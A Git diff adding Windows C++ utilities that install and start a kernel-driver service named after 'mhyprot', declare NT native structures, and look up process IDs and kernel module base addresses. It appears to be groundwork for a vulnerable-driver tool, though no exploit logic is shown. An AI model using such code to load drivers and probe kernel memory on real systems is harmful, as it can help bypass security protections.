@@ -0,0 +1,156 @@
|
||||
#include "service_utils.h"
|
||||
|
||||
//
|
||||
// open service control manager to operate services
|
||||
//
|
||||
SC_HANDLE service_utils::open_sc_manager()
|
||||
{
|
||||
return OpenSCManager(nullptr, nullptr, SC_MANAGER_CREATE_SERVICE);
|
||||
}
|
||||
|
||||
//
|
||||
// create a new service
|
||||
// sc create myservice binPath="" type=kernel
|
||||
//
|
||||
SC_HANDLE service_utils::create_service(const std::string_view driver_path)
|
||||
{
|
||||
SC_HANDLE sc_manager_handle = open_sc_manager();
|
||||
|
||||
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, (SC_HANDLE)INVALID_HANDLE_VALUE);
|
||||
|
||||
SC_HANDLE mhyprot_service_handle = CreateService(
|
||||
sc_manager_handle,
|
||||
MHYPROT_SERVICE_NAME,
|
||||
MHYPROT_DISPLAY_NAME,
|
||||
SERVICE_START | SERVICE_STOP | DELETE,
|
||||
SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE,
|
||||
driver_path.data(), nullptr, nullptr, nullptr, nullptr, nullptr
|
||||
);
|
||||
|
||||
if (!CHECK_HANDLE(mhyprot_service_handle))
|
||||
{
|
||||
const auto last_error = GetLastError();
|
||||
|
||||
if (last_error == ERROR_SERVICE_EXISTS)
|
||||
{
|
||||
printf("Service already exists, open handle\n");
|
||||
|
||||
return OpenService(
|
||||
sc_manager_handle,
|
||||
MHYPROT_SERVICE_NAME,
|
||||
SERVICE_START | SERVICE_STOP | DELETE
|
||||
);
|
||||
}
|
||||
|
||||
printf(("Failed to create %s service. (0x%lX)\n"), MHYPROT_SERVICE_NAME, GetLastError());
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return (SC_HANDLE)(INVALID_HANDLE_VALUE);
|
||||
}
|
||||
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
|
||||
return mhyprot_service_handle;
|
||||
}
|
||||
|
||||
bool service_utils::delete_service_with_check(const std::string_view service_name)
|
||||
{
|
||||
SC_HANDLE sc_manager_handle = open_sc_manager();
|
||||
|
||||
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
|
||||
|
||||
SC_HANDLE service_handle = OpenService(
|
||||
sc_manager_handle,
|
||||
service_name.data(),
|
||||
SERVICE_STOP | DELETE
|
||||
);
|
||||
|
||||
if (!CHECK_HANDLE(service_handle))
|
||||
{
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return false; // Service does not exist
|
||||
}
|
||||
|
||||
SERVICE_STATUS service_status = {};
|
||||
if (!ControlService(service_handle, SERVICE_CONTROL_STOP, &service_status))
|
||||
{
|
||||
CloseServiceHandle(service_handle);
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return false; // Failed to stop service
|
||||
}
|
||||
|
||||
if (!DeleteService(service_handle))
|
||||
{
|
||||
CloseServiceHandle(service_handle);
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return false; // Failed to delete service
|
||||
}
|
||||
|
||||
CloseServiceHandle(service_handle);
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
|
||||
return true; // Successfully stopped and deleted service
|
||||
}
|
||||
|
||||
|
||||
//
|
||||
// delete the service
|
||||
// sc delete myservice
|
||||
//
|
||||
bool service_utils::delete_service(SC_HANDLE service_handle, bool close_on_fail, bool close_on_success)
|
||||
{
|
||||
SC_HANDLE sc_manager_handle = open_sc_manager();
|
||||
|
||||
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
|
||||
|
||||
if (!DeleteService(service_handle))
|
||||
{
|
||||
const auto last_error = GetLastError();
|
||||
|
||||
if (last_error == ERROR_SERVICE_MARKED_FOR_DELETE)
|
||||
{
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return true;
|
||||
}
|
||||
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
if (close_on_fail) CloseServiceHandle(service_handle);
|
||||
return false;
|
||||
}
|
||||
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
if (close_on_success) CloseServiceHandle(service_handle);
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
//
|
||||
// start the service
|
||||
// sc start myservice
|
||||
//
|
||||
bool service_utils::start_service(SC_HANDLE service_handle)
|
||||
{
|
||||
return StartService(service_handle, 0, nullptr);
|
||||
}
|
||||
|
||||
//
|
||||
// stop the service
|
||||
// sc stop myservice
|
||||
//
|
||||
bool service_utils::stop_service(SC_HANDLE service_handle)
|
||||
{
|
||||
SC_HANDLE sc_manager_handle = open_sc_manager();
|
||||
|
||||
CHECK_SC_MANAGER_HANDLE(sc_manager_handle, false);
|
||||
|
||||
SERVICE_STATUS service_status;
|
||||
|
||||
if (!ControlService(service_handle, SERVICE_CONTROL_STOP, &service_status))
|
||||
{
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
return false;
|
||||
}
|
||||
|
||||
CloseServiceHandle(sc_manager_handle);
|
||||
|
||||
return true;
|
||||
}
|
||||
@@ -0,0 +1,26 @@
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include <string>
|
||||
|
||||
#include "../win_utils/win_utils.h"
|
||||
#include "../mhyprotect/mhyprotect.h"
|
||||
|
||||
|
||||
#define CHECK_SC_MANAGER_HANDLE(x, ret_type) \
|
||||
if (!CHECK_HANDLE(x)) \
|
||||
{ \
|
||||
return ret_type; \
|
||||
} \
|
||||
|
||||
namespace service_utils
|
||||
{
|
||||
SC_HANDLE open_sc_manager();
|
||||
|
||||
SC_HANDLE create_service(const std::string_view driver_path);
|
||||
bool delete_service(SC_HANDLE service_handle, bool close_on_fail = true, bool close_on_success = true);
|
||||
|
||||
bool delete_service_with_check(const std::string_view service_name);
|
||||
|
||||
bool start_service(SC_HANDLE service_handle);
|
||||
bool stop_service(SC_HANDLE service_handle);
|
||||
}
|
||||
@@ -0,0 +1,158 @@
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
|
||||
//
|
||||
// windows native definitions
|
||||
//
|
||||
|
||||
#ifndef NT_SUCCESS
|
||||
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
|
||||
#endif
|
||||
|
||||
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
|
||||
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
|
||||
#define STATUS_NOT_IMPLEMENTED ((NTSTATUS)0xC0000002L)
|
||||
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
|
||||
#define STATUS_INVALID_CID ((NTSTATUS)0xC000000BL)
|
||||
#define STATUS_NO_SUCH_DEVICE ((NTSTATUS)0xC000000EL)
|
||||
#define STATUS_NO_SUCH_FILE ((NTSTATUS)0xC000000FL)
|
||||
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010L)
|
||||
#define STATUS_MORE_PROCESSING_REQUIRED ((NTSTATUS)0xC0000016L)
|
||||
#define STATUS_CONFLICTING_ADDRESSES ((NTSTATUS)0xC0000018L)
|
||||
#define STATUS_NO_MORE_ENTRIES ((NTSTATUS)0x8000001AL)
|
||||
#define STATUS_BUFFER_TOO_SMALL ((NTSTATUS)0xC0000023L)
|
||||
#define STATUS_INVALID_PAGE_PROTECTION ((NTSTATUS)0xC0000045L)
|
||||
#define STATUS_PROCEDURE_NOT_FOUND ((NTSTATUS)0xC000007AL)
|
||||
#define STATUS_INSUFFICIENT_RESOURCES ((NTSTATUS)0xC000009AL)
|
||||
#define STATUS_INSTRUCTION_MISALIGNMENT ((NTSTATUS)0xC00000AAL)
|
||||
#define STATUS_INTERNAL_ERROR ((NTSTATUS)0xC00000E5L)
|
||||
#define STATUS_INVALID_PARAMETER_1 ((NTSTATUS)0xC00000EFL)
|
||||
#define STATUS_INVALID_PARAMETER_2 ((NTSTATUS)0xC00000F0L)
|
||||
#define STATUS_INVALID_PARAMETER_3 ((NTSTATUS)0xC00000F1L)
|
||||
#define STATUS_INVALID_PARAMETER_4 ((NTSTATUS)0xC00000F2L)
|
||||
#define STATUS_INVALID_PARAMETER_5 ((NTSTATUS)0xC00000F3L)
|
||||
#define STATUS_INVALID_PARAMETER_6 ((NTSTATUS)0xC00000F4L)
|
||||
#define STATUS_INVALID_PARAMETER_7 ((NTSTATUS)0xC00000F5L)
|
||||
#define STATUS_INVALID_PARAMETER_8 ((NTSTATUS)0xC00000F6L)
|
||||
#define STATUS_INVALID_PARAMETER_9 ((NTSTATUS)0xC00000F7L)
|
||||
#define STATUS_INVALID_PARAMETER_10 ((NTSTATUS)0xC00000F8L)
|
||||
#define STATUS_INVALID_PARAMETER_11 ((NTSTATUS)0xC00000F9L)
|
||||
#define STATUS_INVALID_PARAMETER_12 ((NTSTATUS)0xC00000FAL)
|
||||
#define STATUS_INVALID_ADDRESS ((NTSTATUS)0xC0000141L)
|
||||
#define STATUS_DATATYPE_MISALIGNMENT_ERROR ((NTSTATUS)0xC00002C5L)
|
||||
|
||||
typedef enum _SYSTEM_INFORMATION_CLASS
|
||||
{
|
||||
SystemBasicInformation = 0,
|
||||
SystemProcessorInformation = 1,
|
||||
SystemPerformanceInformation = 2,
|
||||
SystemTimeOfDayInformation = 3,
|
||||
SystemPathInformation = 4,
|
||||
SystemProcessInformation = 5,
|
||||
SystemCallCountInformation = 6,
|
||||
SystemDeviceInformation = 7,
|
||||
SystemProcessorPerformanceInformation = 8,
|
||||
SystemFlagsInformation = 9,
|
||||
SystemCallTimeInformation = 10,
|
||||
SystemModuleInformation = 11,
|
||||
SystemLocksInformation = 12,
|
||||
SystemStackTraceInformation = 13,
|
||||
SystemPagedPoolInformation = 14,
|
||||
SystemNonPagedPoolInformation = 15,
|
||||
SystemHandleInformation = 16,
|
||||
SystemObjectInformation = 17,
|
||||
SystemPageFileInformation = 18,
|
||||
SystemVdmInstemulInformation = 19,
|
||||
SystemVdmBopInformation = 20,
|
||||
SystemFileCacheInformation = 21,
|
||||
SystemPoolTagInformation = 22,
|
||||
SystemInterruptInformation = 23,
|
||||
SystemDpcBehaviorInformation = 24,
|
||||
SystemFullMemoryInformation = 25,
|
||||
SystemLoadGdiDriverInformation = 26,
|
||||
SystemUnloadGdiDriverInformation = 27,
|
||||
SystemTimeAdjustmentInformation = 28,
|
||||
SystemSummaryMemoryInformation = 29,
|
||||
SystemMirrorMemoryInformation = 30,
|
||||
SystemPerformanceTraceInformation = 31,
|
||||
SystemObsolete0 = 32,
|
||||
SystemExceptionInformation = 33,
|
||||
SystemCrashDumpStateInformation = 34,
|
||||
SystemKernelDebuggerInformation = 35,
|
||||
SystemContextSwitchInformation = 36,
|
||||
SystemRegistryQuotaInformation = 37,
|
||||
SystemExtendServiceTableInformation = 38,
|
||||
SystemPrioritySeperation = 39,
|
||||
SystemVerifierAddDriverInformation = 40,
|
||||
SystemVerifierRemoveDriverInformation = 41,
|
||||
SystemProcessorIdleInformation = 42,
|
||||
SystemLegacyDriverInformation = 43,
|
||||
SystemCurrentTimeZoneInformation = 44,
|
||||
SystemLookasideInformation = 45,
|
||||
SystemTimeSlipNotification = 46,
|
||||
SystemSessionCreate = 47,
|
||||
SystemSessionDetach = 48,
|
||||
SystemSessionInformation = 49,
|
||||
SystemRangeStartInformation = 50,
|
||||
SystemVerifierInformation = 51,
|
||||
SystemVerifierThunkExtend = 52,
|
||||
SystemSessionProcessInformation = 53,
|
||||
SystemLoadGdiDriverInSystemSpace = 54,
|
||||
SystemNumaProcessorMap = 55,
|
||||
SystemPrefetcherInformation = 56,
|
||||
SystemExtendedProcessInformation = 57,
|
||||
SystemRecommendedSharedDataAlignment = 58,
|
||||
SystemComPlusPackage = 59,
|
||||
SystemNumaAvailableMemory = 60,
|
||||
SystemProcessorPowerInformation = 61,
|
||||
SystemEmulationBasicInformation = 62,
|
||||
SystemEmulationProcessorInformation = 63,
|
||||
SystemExtendedHandleInformation = 64,
|
||||
SystemLostDelayedWriteInformation = 65,
|
||||
SystemBigPoolInformation = 66,
|
||||
SystemSessionPoolTagInformation = 67,
|
||||
SystemSessionMappedViewInformation = 68,
|
||||
SystemHotpatchInformation = 69,
|
||||
SystemObjectSecurityMode = 70,
|
||||
SystemWatchdogTimerHandler = 71,
|
||||
SystemWatchdogTimerInformation = 72,
|
||||
SystemLogicalProcessorInformation = 73,
|
||||
SystemWow64SharedInformation = 74,
|
||||
SystemRegisterFirmwareTableInformationHandler = 75,
|
||||
SystemFirmwareTableInformation = 76,
|
||||
SystemModuleInformationEx = 77,
|
||||
SystemVerifierTriageInformation = 78,
|
||||
SystemSuperfetchInformation = 79,
|
||||
SystemMemoryListInformation = 80,
|
||||
SystemFileCacheInformationEx = 81,
|
||||
MaxSystemInfoClass = 82
|
||||
} SYSTEM_INFORMATION_CLASS;
|
||||
|
||||
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY
|
||||
{
|
||||
ULONG Unknow1;
|
||||
ULONG Unknow2;
|
||||
ULONG Unknow3;
|
||||
ULONG Unknow4;
|
||||
PVOID DllBase;
|
||||
ULONG Size;
|
||||
ULONG Flags;
|
||||
USHORT Index;
|
||||
USHORT NameLength;
|
||||
USHORT LoadCount;
|
||||
USHORT ModuleNameOffset;
|
||||
char ImageName[256];
|
||||
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
|
||||
|
||||
typedef struct _SYSTEM_MODULE_INFORMATION
|
||||
{
|
||||
ULONG Count;
|
||||
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
|
||||
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
|
||||
|
||||
typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(
|
||||
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
|
||||
OUT PVOID SystemInformation,
|
||||
IN ULONG SystemInformationLength,
|
||||
OUT PULONG ReturnLength
|
||||
);
|
||||
@@ -0,0 +1,98 @@
|
||||
#include "win_utils.h"
|
||||
|
||||
//
|
||||
// find the process id by specific name using ToolHelp32Snapshot
|
||||
//
|
||||
uint32_t win_utils::find_process_id(const std::string_view process_name)
|
||||
{
|
||||
PROCESSENTRY32 processentry = {};
|
||||
|
||||
const unique_handle snapshot(CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle);
|
||||
|
||||
if (!CHECK_HANDLE(snapshot.get()))
|
||||
{
|
||||
//(("[!] Failed to create ToolHelp32Snapshot [0x%lX]\n"), GetLastError());
|
||||
return 0;
|
||||
}
|
||||
|
||||
processentry.dwSize = sizeof(MODULEENTRY32);
|
||||
|
||||
while (Process32Next(snapshot.get(), &processentry) == TRUE)
|
||||
{
|
||||
if (process_name.compare(processentry.szExeFile) == 0)
|
||||
{
|
||||
return processentry.th32ProcessID;
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
//
|
||||
// lookup base address of specific module that loaded in the system
|
||||
// by NtQuerySystemInformation api
|
||||
//
|
||||
uint64_t win_utils::obtain_sysmodule_address(const std::string_view target_module_name)
|
||||
{
|
||||
const HMODULE module_handle = GetModuleHandle(TEXT(("ntdll.dll")));
|
||||
|
||||
if (!CHECK_HANDLE(module_handle))
|
||||
return 0;
|
||||
|
||||
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(module_handle, "NtQuerySystemInformation");
|
||||
|
||||
if (!NtQuerySystemInformation)
|
||||
return 0;
|
||||
|
||||
NTSTATUS status;
|
||||
PVOID buffer;
|
||||
ULONG alloc_size = 0x10000;
|
||||
ULONG needed_size;
|
||||
|
||||
do
|
||||
{
|
||||
buffer = calloc(1, alloc_size);
|
||||
|
||||
if (!buffer)
|
||||
return 0;
|
||||
|
||||
status = NtQuerySystemInformation(SystemModuleInformation, buffer, alloc_size, &needed_size);
|
||||
|
||||
if (!NT_SUCCESS(status) && status != STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
free(buffer);
|
||||
return 0;
|
||||
}
|
||||
|
||||
if (status == STATUS_INFO_LENGTH_MISMATCH)
|
||||
{
|
||||
free(buffer);
|
||||
buffer = NULL;
|
||||
alloc_size *= 2;
|
||||
}
|
||||
|
||||
} while (status == STATUS_INFO_LENGTH_MISMATCH);
|
||||
|
||||
if (!buffer)
|
||||
return 0;
|
||||
|
||||
PSYSTEM_MODULE_INFORMATION module_information = (PSYSTEM_MODULE_INFORMATION)buffer;
|
||||
|
||||
|
||||
for (ULONG i = 0; i < module_information->Count; i++)
|
||||
{
|
||||
SYSTEM_MODULE_INFORMATION_ENTRY module_entry = module_information->Module[i];
|
||||
ULONG_PTR module_address = (ULONG_PTR)module_entry.DllBase;
|
||||
|
||||
if (module_address < MIN_ADDRESS)
|
||||
continue;
|
||||
|
||||
PCHAR module_name = module_entry.ImageName + module_entry.ModuleNameOffset;
|
||||
|
||||
if (target_module_name.compare(module_name) == 0 || std::string(module_name).find(("mhyprot")) != std::string::npos)
|
||||
return module_address;
|
||||
}
|
||||
|
||||
free(buffer);
|
||||
return 0;
|
||||
}
|
||||
@@ -0,0 +1,18 @@
|
||||
#pragma once
|
||||
#include <Windows.h>
|
||||
#include <string>
|
||||
#include <memory>
|
||||
#include <TlHelp32.h>
|
||||
|
||||
#include "nt.h"
|
||||
|
||||
#define CHECK_HANDLE(x) (x && x != INVALID_HANDLE_VALUE)
|
||||
#define MIN_ADDRESS ((ULONG_PTR)0x8000000000000000)
|
||||
|
||||
namespace win_utils
|
||||
{
|
||||
using unique_handle = std::unique_ptr<void, decltype(&CloseHandle)>;
|
||||
|
||||
uint32_t find_process_id(const std::string_view process_name);
|
||||
uint64_t obtain_sysmodule_address(const std::string_view target_module_name);
|
||||
}
|
||||
Reference in New Issue
Block a user